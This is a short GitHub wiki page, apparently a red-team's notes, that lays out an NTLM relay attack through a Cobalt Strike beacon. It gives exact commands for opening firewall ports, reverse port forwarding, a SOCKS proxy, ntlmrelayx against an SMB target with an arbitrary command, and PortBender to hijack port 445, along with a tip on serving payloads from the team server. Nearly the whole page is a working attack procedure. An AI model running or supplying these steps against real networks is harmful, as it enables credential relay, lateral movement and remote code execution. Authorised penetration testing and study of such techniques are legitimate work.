NTLM Relay through CS - CraigDonkin/Infrastructure GitHub Wiki

  1. obtain a beacon as SYSTEM
  2. allow ports 8445 and 8080 inbound on the firewall
powershell New-NetFirewallRule -DisplayName "8445" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
powershell New-NetFirewallRule -DisplayName "8080" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
  1. configure rportfwd
rportfwd 8080 localhost 80
rportfwd 8445 localhost 445
  1. setup socks proxy
socks 1080
  1. Configure proxychains to use the socks proxy
  2. run ntlmrelay
proxychains ntlmrelayx.py -t smb://<target> -smb2support --no-http-server --no-wcf-server -c <command>

If hosting a payload on team server blah:80\payload, the IP of the hosting server needs to be the IP of the host being proxied through. And it would be on port 8080 to redirect to port 80.

  1. Upload PortBender https://github.com/praetorian-inc/PortBender to the C:\Windows\system32\drivers folder and load PortBender.cna within Cobalt Strike > Script Manager
  2. Use portbender to redirect traffic from TCP/445 to TCP/8445

PortBender redirect 445 8445

⚠️ **GitHub.com Fallback** ⚠️